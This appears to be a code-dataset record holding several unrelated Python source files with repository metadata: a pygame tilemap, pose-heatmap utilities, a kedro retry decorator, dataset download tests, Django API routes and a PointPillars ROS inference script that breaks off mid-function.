a0a30fb3f531a597ced69bf76568ef26e5e88019
|
[
"MIT"
] | null | null | null |
src/utils/tilemap.py
|
Magicalbat/Metroidvania-Month-15
|
a0a30fb3f531a597ced69bf76568ef26e5e88019
|
[
"MIT"
] | null | null | null |
src/utils/tilemap.py
|
Magicalbat/Metroidvania-Month-15
|
a0a30fb3f531a597ced69bf76568ef26e5e88019
|
[
"MIT"
] | null | null | null |
import pygame
from pygame.math import Vector2
import json, math
class Tilemap:
def __init__(self, tileSize, imgs, chunkSize=8):
self.tileSize = tileSize
self.imgs = imgs
self.drawTiles = []
self.chunks = {}
self.chunkSize = chunkSize
def toChunkScale(self, p):
return math.floor(p/self.tileSize/self.chunkSize)
def toChunkPos(self, p):
return (self.toChunkScale(p[0]), self.toChunkScale(p[1]))
def collidePoint(self, p:Vector2):
cp = self.toChunkPos(p)
if cp in self.chunks:
for rect in self.chunks[cp]:
if rect.collidepoint(p): return True
return False
def _getColRects(self, testPointsX, testPointsY, colRects):
minX = self.toChunkScale(min(testPointsX))
maxX = self.toChunkScale(max(testPointsX))
minY = self.toChunkScale(min(testPointsY))
maxY = self.toChunkScale(max(testPointsY))
testChunkPositions = {
(minX, minY), (minX, maxY),
(maxX, minY), (maxX, maxY)
}
if colRects is None: colRects = []
for pos in testChunkPositions:
if pos in self.chunks:
colRects += self.chunks[pos]
return colRects
def getEntityColRects(self, pos, width, height, vel, colRects=None):
return self._getColRects( \
( pos.x, pos.x + width, pos.x + vel.x, pos.x + width + vel.x ),
( pos.y, pos.y + height, pos.y + vel.y, pos.y + height + vel.y ), \
colRects)
def getRectColRects(self, rect, colRects=None):
return self._getColRects((rect.x, rect.right), (rect.y, rect.bottom), colRects)
def draw(self, win, scroll=None):
if scroll is None: scroll = Vector2(0, 0)
winDim = win.get_size()
for layer in self.drawTiles:
for tile in layer:
if tile[0] < winDim[0]+scroll.x and tile[0] > scroll.x-self.tileSize and \
tile[1] < winDim[1]+scroll.y and tile[1] > scroll.y-self.tileSize:
win.blit(self.imgs[tile[2]], (tile[0] - scroll.x, tile[1] - scroll.y))
def drawCollision(self, win, scroll=None):
if scroll is None: scroll = Vector2(0, 0)
cols = ((255,0,0), (0,255,0), (0,0,255))
for pos, rects in self.chunks.items():
pygame.draw.rect(win, (255,255,255), \
(pos[0] * self.tileSize * self.chunkSize - scroll.x,\
pos[1] * self.tileSize * self.chunkSize - scroll.y,\
self.tileSize * self.chunkSize, self.tileSize * self.chunkSize), 1)
for i, rect in enumerate(rects):
pygame.draw.rect(win, cols[i%len(cols)], \
(rect.x - scroll.x, rect.y - scroll.y, \
rect.w, rect.h), width=1)
def loadLevel(self, filepath):
with open(filepath, 'r') as f:
data = json.loads(f.read())
for layer in data["drawTiles"]:
tempLayer = []
for key, item in layer.items():
pStr = key.split(';')
x, y = int(pStr[0]), int(pStr[1])
tempLayer.append((x*self.tileSize, y*self.tileSize, item))
self.drawTiles.append(tempLayer)
for pos, rects in data["chunks"].items():
tempRects = []
for rect in rects:
tempRects.append(pygame.Rect(rect))
pStr = pos.split(';')
self.chunks[(int(pStr[0]), int(pStr[1]))] = tempRects
if "extraData" in data:
return data["extraData"]
| 38.126316
| 90
| 0.549144
| 446
| 3,622
| 4.441704
| 0.213004
| 0.066633
| 0.040384
| 0.063099
| 0.13478
| 0.062595
| 0.046441
| 0.046441
| 0.046441
| 0.046441
| 0
| 0.021044
| 0.31778
| 3,622
| 95
| 91
| 38.126316
| 0.780656
| 0
| 0
| 0.025316
| 0
| 0
| 0.009937
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.126582
| false
| 0
| 0.037975
| 0.050633
| 0.265823
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e508c95181eba9329a23ec0f597dadfe33c7e09
| 7,295
|
py
|
Python
|
src/dsnt/util.py
|
anibali/dsnt-pose2d
|
f453331a6b120f02948336555b996ac0d95bf4be
|
[
"Apache-2.0"
] | 12
|
2018-10-18T06:41:00.000Z
|
2021-07-31T08:19:41.000Z
|
src/dsnt/util.py
|
anibali/dsnt-pose2d
|
f453331a6b120f02948336555b996ac0d95bf4be
|
[
"Apache-2.0"
] | 2
|
2019-07-15T13:36:08.000Z
|
2020-03-09T04:39:08.000Z
|
src/dsnt/util.py
|
anibali/dsnt-pose2d
|
f453331a6b120f02948336555b996ac0d95bf4be
|
[
"Apache-2.0"
] | 5
|
2019-01-08T01:32:18.000Z
|
2020-08-04T07:42:12.000Z
|
"""
Miscellaneous utility functions.
"""
import random
import time
from contextlib import contextmanager
import math
import numpy as np
import torch
from PIL.ImageDraw import Draw
# Joints to connect for visualisation, giving the effect of drawing a
# basic "skeleton" of the pose.
BONES = {
'right_lower_leg': (0, 1),
'right_upper_leg': (1, 2),
'right_pelvis': (2, 6),
'left_lower_leg': (4, 5),
'left_upper_leg': (3, 4),
'left_pelvis': (3, 6),
'center_lower_torso': (6, 7),
'center_upper_torso': (7, 8),
'center_head': (8, 9),
'right_lower_arm': (10, 11),
'right_upper_arm': (11, 12),
'right_shoulder': (12, 8),
'left_lower_arm': (14, 15),
'left_upper_arm': (13, 14),
'left_shoulder': (13, 8),
}
def draw_skeleton(img, coords, joint_mask=None):
'''Draw a pose skeleton connecting joints (for visualisation purposes).
    Left-hand-side joints are connected with blue lines. Right-hand-side joints
are connected with red lines. Center joints are connected with magenta
lines.
Args:
img (PIL.Image.Image): PIL image which the skeleton will be drawn over.
coords (Tensor): 16x2 tensor containing 0-based pixel coordinates
of joint locations. Joints indices are expected to match
http://human-pose.mpi-inf.mpg.de/#download
joint_mask (Tensor, optional): Mask of valid joints (invalid joints
will be drawn with grey lines).
'''
draw = Draw(img)
for bone_name, (j1, j2) in BONES.items():
if bone_name.startswith('center_'):
colour = (255, 0, 255) # Magenta
elif bone_name.startswith('left_'):
colour = (0, 0, 255) # Blue
elif bone_name.startswith('right_'):
colour = (255, 0, 0) # Red
else:
colour = (255, 255, 255)
if joint_mask is not None:
# Change colour to grey if either vertex is not masked in
if joint_mask[j1] == 0 or joint_mask[j2] == 0:
colour = (100, 100, 100)
draw.line([coords[j1, 0], coords[j1, 1], coords[j2, 0], coords[j2, 1]], fill=colour)
def draw_gaussian(img_tensor, x, y, sigma, normalize=False, clip_size=None):
'''Draw a Gaussian in a single-channel 2D image.
Args:
img_tensor: Image tensor to draw to.
x: x-coordinate of Gaussian centre (in pixels).
y: y-coordinate of Gaussian centre (in pixels).
sigma: Standard deviation of Gaussian (in pixels).
normalize: Ensures values sum to 1 when True.
clip_size: Restrict the size of the draw region.
'''
# To me it makes more sense to round() these, but hey - I'm just following the example
# of others.
x = int(x)
y = int(y)
if img_tensor.dim() == 2:
height, width = list(img_tensor.size())
elif img_tensor.dim() == 3:
n_chans, height, width = list(img_tensor.size())
assert n_chans == 1, 'expected img_tensor to have one channel'
img_tensor = img_tensor[0]
else:
raise Exception('expected img_tensor to have 2 or 3 dimensions')
radius = max(width, height)
if clip_size is not None:
radius = clip_size / 2
if radius < 0.5 or x <= -radius or y <= -radius or \
x >= (width - 1) + radius or y >= (height - 1) + radius:
return
start_x = max(0, math.ceil(x - radius))
end_x = min(width, int(x + radius + 1))
start_y = max(0, math.ceil(y - radius))
end_y = min(height, int(y + radius + 1))
w = end_x - start_x
h = end_y - start_y
subimg = img_tensor[start_y:end_y, start_x:end_x]
xs = torch.arange(start_x, end_x).type_as(img_tensor).view(1, w).expand_as(subimg)
ys = torch.arange(start_y, end_y).type_as(img_tensor).view(h, 1).expand_as(subimg)
k = -0.5 * (1 / sigma)**2
subimg.copy_((xs - x)**2)
subimg.add_((ys - y)**2)
subimg.mul_(k)
subimg.exp_()
if normalize:
val_sum = subimg.sum()
if val_sum > 0:
subimg.div_(val_sum)
def encode_heatmaps(coords, width, height, sigma=1):
'''Convert normalised coordinates into heatmaps.'''
# Normalised coordinates to pixel coordinates
coords.add_(1)
coords[:, :, 0].mul_(width / 2)
coords[:, :, 1].mul_(height / 2)
coords.add_(-0.5)
batch_size = coords.size(0)
n_chans = coords.size(1)
target = torch.FloatTensor(batch_size, n_chans, height, width).zero_()
for i in range(batch_size):
for j in range(n_chans):
x = round(coords[i, j, 0])
y = round(coords[i, j, 1])
draw_gaussian(target[i, j], x, y, sigma, normalize=False, clip_size=7)
return target
def get_preds(heatmaps):
batch_size, n_chans, height, width = list(heatmaps.size())
maxval, idx = torch.max(heatmaps.view(batch_size, n_chans, -1), 2)
maxval = maxval.view(batch_size, n_chans, 1)
idx = idx.view(batch_size, n_chans, 1)
coords = idx.repeat(1, 1, 2)
coords[:, :, 0] = coords[:, :, 0] % width
    coords[:, :, 1] = coords[:, :, 1] / width  # row index: flat idx // width (coords is still a LongTensor here)
coords = coords.float()
# When maxval is zero, select coords (0, 0)
pred_mask = maxval.gt(0).repeat(1, 1, 2).float()
torch.mul(coords, pred_mask, out=coords)
return coords
def decode_heatmaps(heatmaps, use_neighbours=True):
'''Convert heatmaps into normalised coordinates.'''
coords = get_preds(heatmaps)
_, _, height, width = list(heatmaps.size())
if use_neighbours:
# "To improve performance at high precision thresholds the prediction
# is offset by a quarter of a pixel in the direction of its next highest
# neighbor before transforming back to the original coordinate space
# of the image"
# - Stacked Hourglass Networks for Human Pose Estimation
for i, joint_coords in enumerate(coords):
for j, (x, y) in enumerate(joint_coords):
x = int(x)
y = int(y)
if x > 0 and x < width - 1 and y > 0 and y < height - 1:
hm = heatmaps[i, j]
joint_coords[j, 0] += (0.25 * np.sign(hm[y, x + 1] - hm[y, x - 1]))
joint_coords[j, 1] += (0.25 * np.sign(hm[y + 1, x] - hm[y - 1, x]))
# Pixel coordinates to normalised coordinates
coords.add_(0.5)
coords[:, :, 0].mul_(2 / width)
coords[:, :, 1].mul_(2 / height)
coords.add_(-1)
return coords
def type_as_index(indices, tensor):
if tensor.is_cuda:
return indices.type(torch.cuda.LongTensor)
return indices.type(torch.LongTensor)
def reverse_tensor(tensor, dim):
indices = torch.arange(tensor.size(dim) - 1, -1, -1)
indices = type_as_index(indices, tensor)
return tensor.index_select(dim, indices)
@contextmanager
def timer(meter):
start_time = time.perf_counter()
yield
time_elapsed = time.perf_counter() - start_time
meter.add(time_elapsed)
def generator_timer(generator, meter):
while True:
with timer(meter):
vals = next(generator)
yield vals
def seed_random_number_generators(seed):
"""Seed all random number generators."""
random.seed(seed)
np.random.seed(seed)
torch.manual_seed(seed)
torch.cuda.manual_seed_all(seed)
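if __name__ == '__main__':
    # Minimal sketch (illustrative values): render one Gaussian blob into an
    # 8x8 heatmap and check that normalisation makes the mass sum to 1.
    hm = torch.zeros(8, 8)
    draw_gaussian(hm, x=3, y=4, sigma=1.0, normalize=True)
    assert abs(hm.sum() - 1.0) < 1e-5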
| 31.042553
| 92
| 0.615216
| 1,060
| 7,295
| 4.09717
| 0.25566
| 0.02694
| 0.011513
| 0.017269
| 0.120424
| 0.078747
| 0.018881
| 0
| 0
| 0
| 0
| 0.032413
| 0.259904
| 7,295
| 234
| 93
| 31.175214
| 0.771995
| 0.246059
| 0
| 0.056738
| 0
| 0
| 0.058616
| 0
| 0
| 0
| 0
| 0
| 0.007092
| 1
| 0.070922
| false
| 0
| 0.049645
| 0
| 0.170213
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e5750ff5296717b749da87c576b380ec5a0ca38
| 1,818
|
py
|
Python
|
kedro/extras/decorators/retry_node.py
|
hfwittmann/kedro
|
b0d4fcd8f19b49a7916d78fd09daeb6209a7b6c6
|
[
"Apache-2.0"
] | 1
|
2021-11-25T12:33:13.000Z
|
2021-11-25T12:33:13.000Z
|
kedro/extras/decorators/retry_node.py
|
MerelTheisenQB/kedro
|
1eaa2e0fa5d80f96e18ea60b9f3d6e6efc161827
|
[
"Apache-2.0"
] | null | null | null |
kedro/extras/decorators/retry_node.py
|
MerelTheisenQB/kedro
|
1eaa2e0fa5d80f96e18ea60b9f3d6e6efc161827
|
[
"Apache-2.0"
] | null | null | null |
"""
This module contains the retry decorator, which can be used as
``Node`` decorators to retry nodes. See ``kedro.pipeline.node.decorate``
"""
import logging
from functools import wraps
from time import sleep
from typing import Callable, Type
def retry(
exceptions: Type[Exception] = Exception, n_times: int = 1, delay_sec: float = 0
) -> Callable:
"""
Catches exceptions from the wrapped function at most n_times and then
bundles and propagates them.
**Make sure your function does not mutate the arguments**
Args:
exceptions: The superclass of exceptions to catch.
By default catch all exceptions.
        n_times: Let the function fail at most n_times, then bundle the
            errors and propagate them. By default retry only once.
delay_sec: Delay between failure and next retry in seconds
Returns:
The original function with retry functionality.
"""
def _retry(func: Callable):
@wraps(func)
def _wrapper(*args, **kwargs):
counter = n_times
errors = []
while counter >= 0:
try:
return func(*args, **kwargs)
# pylint: disable=broad-except
except exceptions as exc:
errors.append(exc)
if counter != 0:
sleep(delay_sec)
counter -= 1
if errors:
log = logging.getLogger(__name__)
log.error(
"Function `%s` failed %i times. Errors:\n", func.__name__, n_times
)
log.error("\n".join(str(err) for err in errors))
log.error("Raising last exception")
raise errors[-1]
return _wrapper
return _retry
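# Minimal usage sketch (hypothetical flaky function, for illustration): the
# call below is retried twice with no delay and succeeds on the third attempt.
if __name__ == "__main__":
    attempts = {"n": 0}

    @retry(exceptions=ValueError, n_times=2, delay_sec=0)
    def _flaky():
        attempts["n"] += 1
        if attempts["n"] < 3:
            raise ValueError("transient failure")
        return "ok"

    assert _flaky() == "ok"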
| 30.3
| 86
| 0.573707
| 210
| 1,818
| 4.866667
| 0.514286
| 0.035225
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.005076
| 0.349835
| 1,818
| 59
| 87
| 30.813559
| 0.85956
| 0.374587
| 0
| 0
| 0
| 0
| 0.059646
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.133333
| 0
| 0.333333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e57932c1bf27e86e563c5240b4f42764bb1b0f4
| 1,470
|
py
|
Python
|
test/lmp/dset/_base/test_download_file.py
|
ProFatXuanAll/char-RNN
|
531f101b3d1ba20bafd28ca060aafe6f583d1efb
|
[
"Beerware"
] | null | null | null |
test/lmp/dset/_base/test_download_file.py
|
ProFatXuanAll/char-RNN
|
531f101b3d1ba20bafd28ca060aafe6f583d1efb
|
[
"Beerware"
] | null | null | null |
test/lmp/dset/_base/test_download_file.py
|
ProFatXuanAll/char-RNN
|
531f101b3d1ba20bafd28ca060aafe6f583d1efb
|
[
"Beerware"
] | null | null | null |
"""Test the ability to download files.
Test target:
- :py:meth:`lmp.dset._base.BaseDset.download`.
"""
import os
from typing import Callable
import pytest
import lmp.dset._base
import lmp.util.path
@pytest.fixture
def file_url() -> str:
"""Download target file URL."""
return 'https://raw.githubusercontent.com/ProFatXuanAll/language-model-playground/main/README.rst'
@pytest.fixture
def file_path(clean_dir_finalizer_factory: Callable[[str], None], exp_name: str, file_url: str, request) -> str:
"""Download file path.
After testing, clean up files and directories created during test.
"""
# Create temporary directory.
abs_dir_path = os.path.join(lmp.util.path.DATA_PATH, exp_name)
if not os.path.exists(abs_dir_path):
os.makedirs(abs_dir_path)
abs_file_path = os.path.join(abs_dir_path, file_url.split(r'/')[-1])
request.addfinalizer(clean_dir_finalizer_factory(abs_dir_path))
return abs_file_path
def test_download_as_text_file(file_path: str, file_url: str) -> None:
"""Must be able to download file and output as text file."""
lmp.dset._base.BaseDset.download_file(mode='text', download_path=file_path, url=file_url)
assert os.path.exists(file_path)
def test_download_as_binary_file(file_path: str, file_url: str) -> None:
"""Must be able to download file and output as binary file."""
lmp.dset._base.BaseDset.download_file(mode='binary', download_path=file_path, url=file_url)
assert os.path.exists(file_path)
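# These tests can be run from the repository root with pytest, e.g.:
#   pytest test/lmp/dset/_base/test_download_file.py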
| 30
| 112
| 0.755782
| 232
| 1,470
| 4.560345
| 0.327586
| 0.075614
| 0.047259
| 0.053875
| 0.365785
| 0.340265
| 0.300567
| 0.300567
| 0.226843
| 0.226843
| 0
| 0.000774
| 0.121088
| 1,470
| 48
| 113
| 30.625
| 0.818111
| 0.238776
| 0
| 0.181818
| 0
| 0.045455
| 0.091996
| 0
| 0
| 0
| 0
| 0
| 0.090909
| 1
| 0.181818
| false
| 0
| 0.227273
| 0
| 0.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e5ac8d618f9e77a2b39df9c4c03557f518e532c
| 1,347
|
py
|
Python
|
src/api/urls.py
|
Karim-Valeev/django-myfoods
|
e8750a05461616a2e7740230177a139749daac73
|
[
"MIT"
] | null | null | null |
src/api/urls.py
|
Karim-Valeev/django-myfoods
|
e8750a05461616a2e7740230177a139749daac73
|
[
"MIT"
] | null | null | null |
src/api/urls.py
|
Karim-Valeev/django-myfoods
|
e8750a05461616a2e7740230177a139749daac73
|
[
"MIT"
] | null | null | null |
from django.urls import path, re_path
from drf_yasg import openapi
from drf_yasg.views import get_schema_view
from rest_framework.routers import SimpleRouter, DefaultRouter
from rest_framework_simplejwt import views as jwt_views
from api.views import *
# The router is needed to generate the URLs for the viewset automatically, so we don't have to write them out by hand
router = SimpleRouter()
router.register("baskets", BasketViewSet, "baskets")
schema_view = get_schema_view(
openapi.Info(
title="Snippets API",
default_version="v1",
description="Test description",
terms_of_service="https://www.google.com/policies/terms/",
contact=openapi.Contact(email="contact@snippets.local"),
license=openapi.License(name="BSD License"),
),
public=True,
)
urlpatterns = [
path("check/", check_api_view, name="check-api"),
path("token/", jwt_views.TokenObtainPairView.as_view(), name="token-obtain-pair"),
path("token/refresh/", jwt_views.TokenRefreshView.as_view(), name="token-refresh"),
*router.urls,
re_path(r"swagger(?P<format>\.json|\.yaml)$", schema_view.without_ui(cache_timeout=0), name="schema-json"),
path("swagger/", schema_view.with_ui("swagger", cache_timeout=0), name="schema-swagger-ui"),
path("redoc/", schema_view.with_ui("redoc", cache_timeout=0), name="schema-redoc"),
]
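# For reference (assuming BasketViewSet implements the default ViewSet
# actions), the router registration above yields routes such as
# GET/POST baskets/ and GET/PUT/PATCH/DELETE baskets/<pk>/, relative to
# wherever this module's urlpatterns are included.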
| 38.485714
| 111
| 0.723831
| 179
| 1,347
| 5.273743
| 0.47486
| 0.063559
| 0.041314
| 0.054025
| 0.073093
| 0
| 0
| 0
| 0
| 0
| 0
| 0.003436
| 0.135857
| 1,347
| 34
| 112
| 39.617647
| 0.80756
| 0.064588
| 0
| 0
| 0
| 0
| 0.221781
| 0.04372
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.214286
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
4e5b531d4dae58f3f455001978beda2d6160593c
| 18,417
|
py
|
Python
|
second/pytorch/inference_ros.py
|
neolixcn/nutonomy_pointpillars
|
03f46f6de97c0c97d7bc98d7af3daee215d81a30
|
[
"MIT"
] | 1
|
2021-06-11T00:54:48.000Z
|
2021-06-11T00:54:48.000Z
|
second/pytorch/inference_ros.py
|
neolixcn/nutonomy_pointpillars
|
03f46f6de97c0c97d7bc98d7af3daee215d81a30
|
[
"MIT"
] | null | null | null |
second/pytorch/inference_ros.py
|
neolixcn/nutonomy_pointpillars
|
03f46f6de97c0c97d7bc98d7af3daee215d81a30
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import argparse
import pathlib
import pickle
import shutil
import time
from functools import partial
import sys
sys.path.append('../')
from pathlib import Path
import fire
import numpy as np
import torch
import torch.nn as nn
print(torch.__version__)
print(os.environ['PYTHONPATH'])
from google.protobuf import text_format
import rospy
from sensor_msgs.msg import PointCloud2
import sensor_msgs.point_cloud2 as pc2
from std_msgs.msg import Header
from jsk_recognition_msgs.msg import BoundingBox, BoundingBoxArray
import torchplus
import second.data.kitti_common as kitti
from second.builder import target_assigner_builder, voxel_builder
from second.data.preprocess import merge_second_batch
from second.protos import pipeline_pb2
from second.pytorch.builder import (box_coder_builder, input_reader_builder,
lr_scheduler_builder, optimizer_builder,
second_builder)
from second.utils.eval import get_coco_eval_result, get_official_eval_result
from second.utils.progress_bar import ProgressBar
def get_paddings_indicator(actual_num, max_num, axis=0):
"""
Create boolean mask by actually number of a padded tensor.
:param actual_num:
:param max_num:
:param axis:
:return: [type]: [description]
"""
actual_num = torch.unsqueeze(actual_num, axis+1)
max_num_shape = [1] * len(actual_num.shape)
max_num_shape[axis+1] = -1
max_num = torch.arange(max_num, dtype=torch.int, device=actual_num.device).view(max_num_shape)
# tiled_actual_num : [N, M, 1]
# tiled_actual_num : [[3,3,3,3,3], [4,4,4,4,4], [2,2,2,2,2]]
# title_max_num : [[0,1,2,3,4], [0,1,2,3,4], [0,1,2,3,4]]
paddings_indicator = actual_num.int() > max_num
# paddings_indicator shape : [batch_size, max_num]
return paddings_indicator
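# Illustrative example: get_paddings_indicator(torch.tensor([3., 4., 2.]), 5)
# yields a (3, 5) boolean mask that is True for the first 3/4/2 entries of
# each row (real points) and False over the zero-padded tail.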
def _get_pos_neg_loss(cls_loss, labels):
# cls_loss: [N, num_anchors, num_class]
# labels: [N, num_anchors]
batch_size = cls_loss.shape[0]
if cls_loss.shape[-1] == 1 or len(cls_loss.shape) == 2:
cls_pos_loss = (labels > 0).type_as(cls_loss) * cls_loss.view(
batch_size, -1)
cls_neg_loss = (labels == 0).type_as(cls_loss) * cls_loss.view(
batch_size, -1)
cls_pos_loss = cls_pos_loss.sum() / batch_size
cls_neg_loss = cls_neg_loss.sum() / batch_size
else:
cls_pos_loss = cls_loss[..., 1:].sum() / batch_size
cls_neg_loss = cls_loss[..., 0].sum() / batch_size
return cls_pos_loss, cls_neg_loss
def _flat_nested_json_dict(json_dict, flatted, sep=".", start=""):
for k, v in json_dict.items():
if isinstance(v, dict):
_flat_nested_json_dict(v, flatted, sep, start + sep + k)
else:
flatted[start + sep + k] = v
def flat_nested_json_dict(json_dict, sep=".") -> dict:
"""flat a nested json-like dict. this function make shadow copy.
"""
flatted = {}
for k, v in json_dict.items():
if isinstance(v, dict):
_flat_nested_json_dict(v, flatted, sep, k)
else:
flatted[k] = v
return flatted
def example_convert_to_torch(example, dtype=torch.float32, device=None) -> dict:
# device = device or torch.device("cuda:0")
example_torch = {}
# float_names = ["voxels", "anchors", "reg_targets", "reg_weights", "bev_map", "rect", "Trv2c", "P2"]
float_names = ["voxels", "anchors", "reg_targets", "reg_weights", "bev_map"]
for k, v in example.items():
if k in float_names:
example_torch[k] = torch.as_tensor(v, dtype=dtype).cuda()
elif k in ["coordinates", "labels", "num_points"]:
example_torch[k] = torch.as_tensor(v, dtype=torch.int32).cuda()
elif k in ["anchors_mask"]:
example_torch[k] = torch.as_tensor(v, dtype=torch.uint8).cuda()
# torch.uint8 is now deprecated, please use a dtype torch.bool instead
else:
example_torch[k] = v
return example_torch
def _make_point_field(num_field):
msg_pf1 = pc2.PointField()
msg_pf1.name = np.str('x')
msg_pf1.offset = np.uint32(0)
msg_pf1.datatype = np.uint8(7)
msg_pf1.count = np.uint32(1)
msg_pf2 = pc2.PointField()
msg_pf2.name = np.str('y')
msg_pf2.offset = np.uint32(4)
msg_pf2.datatype = np.uint8(7)
msg_pf2.count = np.uint32(1)
msg_pf3 = pc2.PointField()
msg_pf3.name = np.str('z')
msg_pf3.offset = np.uint32(8)
msg_pf3.datatype = np.uint8(7)
msg_pf3.count = np.uint32(1)
msg_pf4 = pc2.PointField()
msg_pf4.name = np.str('intensity')
msg_pf4.offset = np.uint32(16)
msg_pf4.datatype = np.uint8(7)
msg_pf4.count = np.uint32(1)
if num_field == 4:
return [msg_pf1, msg_pf2, msg_pf3, msg_pf4]
msg_pf5 = pc2.PointField()
msg_pf5.name = np.str('label')
msg_pf5.offset = np.uint32(20)
msg_pf5.datatype = np.uint8(4)
msg_pf5.count = np.uint32(1)
return [msg_pf1, msg_pf2, msg_pf3, msg_pf4, msg_pf5]
def publish_test(np_p_ranged, frame_id):
header = Header()
header.stamp = rospy.Time()
header.frame_id = frame_id
x = np_p_ranged[:, 0].reshape(-1)
y = np_p_ranged[:, 1].reshape(-1)
z = np_p_ranged[:, 2].reshape(-1)
if np_p_ranged.shape[1] == 4:
i = np_p_ranged[:, 3].reshape(-1)
else:
        i = np.zeros((np_p_ranged.shape[0], 1)).reshape(-1)
cloud = np.stack((x, y, z, i))
msg_segment = pc2.create_cloud(header=header,
fields=_make_point_field(4),
points=cloud.T)
pub_points.publish(msg_segment)
def predict_kitti_to_anno(net,
example,
class_names,
center_limit_range=None,
lidar_input=False,
global_set=None):
# eval example : [0: 'voxels', 1: 'num_points', 2: 'coordinates', 3: 'rect'
# 4: 'Trv2c', 5: 'P2', 6: 'anchors', 7: 'anchors_mask'
# 8: 'image_idx', 9: 'image_shape']
# eval example [0: 'voxels', 1: 'num_points', 2: 'coordinate', 3: 'anchors',
# 4: 'anchor_mask', 5: 'pc_idx']
pillar_x = example[0][:, :, 0].unsqueeze(0).unsqueeze(0)
pillar_y = example[0][:, :, 1].unsqueeze(0).unsqueeze(0)
pillar_z = example[0][:, :, 2].unsqueeze(0).unsqueeze(0)
pillar_i = example[0][:, :, 3].unsqueeze(0).unsqueeze(0)
num_points_per_pillar = example[1].float().unsqueeze(0)
# Find distance of x, y, and z from pillar center
# assuming xyres_16.proto
coors_x = example[2][:, 3].float()
coors_y = example[2][:, 2].float()
x_sub = coors_x.unsqueeze(1) * 0.16 -22.96 #+ 0.08#-22.96#+ 0.08#-22.96#-19.76
y_sub = coors_y.unsqueeze(1) * 0.16 -22.96#- 19.76 #-22.96#-19.76#-22.96#-19.76
ones = torch.ones([1, 100], dtype=torch.float32, device=pillar_x.device)
x_sub_shaped = torch.mm(x_sub, ones).unsqueeze(0).unsqueeze(0)
y_sub_shaped = torch.mm(y_sub, ones).unsqueeze(0).unsqueeze(0)
num_points_for_a_pillar = pillar_x.size()[3]
mask = get_paddings_indicator(num_points_per_pillar, num_points_for_a_pillar, axis=0)
mask = mask.permute(0, 2, 1)
mask = mask.unsqueeze(1)
mask = mask.type_as(pillar_x)
coors = example[2]
anchors = example[3]
anchors_mask = example[4]
anchors_mask = torch.as_tensor(anchors_mask, dtype=torch.uint8, device=pillar_x.device)
anchors_mask = anchors_mask.byte()
# rect = example[3]
# Trv2c = example[4]
# P2 = example[5]
pc_idx = example[5]
input = [pillar_x, pillar_y, pillar_z, pillar_i,
num_points_per_pillar, x_sub_shaped, y_sub_shaped,
mask, coors, anchors, anchors_mask, pc_idx]
predictions_dicts = net(input)
# lidar_box, final_score, label_preds, pc_idx
annos = []
for i, preds_dict in enumerate(predictions_dicts):
# image_shape = batch_image_shape[i]
pc_idx = preds_dict[3]
if preds_dict[0] is not None: # bbox list
# box_2d_preds = preds_dict[0].detach().cpu().numpy() # bbox
# box_preds = preds_dict[1].detach().cpu().numpy() # bbox3d_camera
scores = preds_dict[1].detach().cpu().numpy() # scores
box_preds_lidar = preds_dict[0].detach().cpu().numpy() # box3d_lidar
# write pred to file
label_preds = preds_dict[2].detach().cpu().numpy() # label_preds
anno = kitti.get_start_result_anno()
num_example = 0
content = ''
for box_lidar, score, label in zip(
box_preds_lidar, scores, label_preds):
if center_limit_range is not None:
limit_range = np.array(center_limit_range)
if (np.any(box_lidar[:3] < limit_range[:3])
or np.any(box_lidar[:3] > limit_range[3:])):
continue
content += str(label) + " 0.0 0 0.0 0.0 0.0 0.0 0.0 " + str(box_lidar[5]) + " " + str(box_lidar[3]) + " "\
+ str(box_lidar[4]) + " " + str(box_lidar[0]) + " " + str(box_lidar[1]) + " " + str(box_lidar[2]) + " " + str(box_lidar[6]) + " " + str(score) + "\n"
anno["name"].append(class_names[int(label)])
anno["truncated"].append(0.0)
anno["occluded"].append(0)
anno["alpha"].append(-np.arctan2(-box_lidar[1], box_lidar[0]) +
box_lidar[6])
anno["bbox"].append(np.array([0, 0, 0, 0]))
anno["dimensions"].append([box_lidar[4], box_lidar[5], box_lidar[3]]) # annotate by shl
# anno["dimensions"].append(box_lidar[3:6])
anno["location"].append(box_lidar[:3])
anno["rotation_y"].append(box_lidar[6])
if global_set is not None:
for i in range(100000):
if score in global_set:
score -= 1 / 100000
else:
global_set.add(score)
break
anno["score"].append(score)
num_example += 1
content = content.strip()
def delete_nan_points(points):
    """Return only the points whose x/y/z coordinates are all non-NaN."""
    new_points = []
    for point in points:
        if np.isnan(point[0]) or np.isnan(point[1]) or np.isnan(point[2]):
            continue
